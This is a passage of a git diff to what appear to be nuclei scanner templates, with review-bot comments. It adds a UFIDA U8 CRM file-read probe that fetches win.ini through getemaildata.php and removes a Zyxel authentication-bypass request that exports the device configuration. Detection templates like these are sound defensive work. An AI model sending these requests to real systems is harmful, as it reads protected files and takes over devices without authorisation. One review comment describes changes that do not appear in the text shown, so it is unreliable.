/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - matchers: - - type: dsl - dsl: - - status_code_1 == 200 && contains(body_1,"for 16-bit app support") - condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml new file mode 100644 index 0000000000..00c3279c2a --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml 
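Review bot: Dropping `stop-at-first-match: true` changes behaviour rather than just tidying: as I read nuclei's raw-request semantics, with `condition: or` across two requests the template previously stopped after the first probe that matched, and now both serialized payloads are always sent to every host, including ones already confirmed by the Windows-style `set /A` probe. If the intent is to make `max-request: 2` exact, say so in the commit message; otherwise restore `stop-at-first-match: true` above `matchers:`. Removing the stray trailing comment `# 利用直接改头部` is fine, but the new last line again lacks an end-of-file newline.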
@@ -0,0 +1,29 @@ +id: yonyou-u8-crm-lfi + +info: + name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: body="用友U8CRM" + verified: true + tags: yonyou,u8-crm,lfi + +http: + - raw: + - | + POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1,"bit app support") && contains(body_1,"extensions") && contains(body_1,"fonts")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/zyxel/CVE-2022-0342.yaml b/http/vulnerabilities/zyxel/CVE-2022-0342.yaml deleted file mode 100644 index eed1c60166..0000000000 --- a/http/vulnerabilities/zyxel/CVE-2022-0342.yaml +++ /dev/null 
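Review bot: The probe reads `c:/windows/win.ini` and the second DSL line requires `bit app support`, `extensions` and `fonts`, so the template only confirms the issue on Windows-hosted U8 CRM; a vulnerable deployment on another OS yields no match. Either document that limitation in the description (`Detection reads win.ini, so only Windows hosts are confirmed.`) or add a second request with an OS-appropriate path and its own matcher, raising `max-request` accordingly. Splitting the former single DSL expression into `'status_code_1 == 200'` and the content check under `condition: and` reads better, and requiring three distinct win.ini strings reduces false positives from generic pages that merely echo `bit app support`.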
@@ -1,41 +0,0 @@ -id: CVE-2022-0342 - -info: - name: CVE-2022-0342 Zyxel Authentication Bypass - author: SleepingBag945 - severity: critical - description: Zyxel USG/ZyWALL是中国合勤科技(Zyxel)公司的一款防火墙。ZyWALL 4.20版本至4.70版本、USG FLEX 4.50版本至5.20版本、ATP 4.32版本至5.20版本、VPN 4.30版本至5.20版本、NSG 1.20版本至1.33 Patch 4版本存在安全漏洞,攻击者利用该漏洞绕过Web身份验证并获得设备的管理访问权限。 - tags: zyxel - - -http: - - raw: - - | - GET /cgi-bin/export-cgi?category=config&arg0=startup-config.conf HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip, deflate - Connection: close - - - - - - matchers-condition: and - matchers: - - type: word - words: - - "interface-name" - condition: and - - - type: word - words: - - "text/zyxel" - part: header - condition: and - - - type: status - status: - - 200 - -# https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/ \ No newline at end of file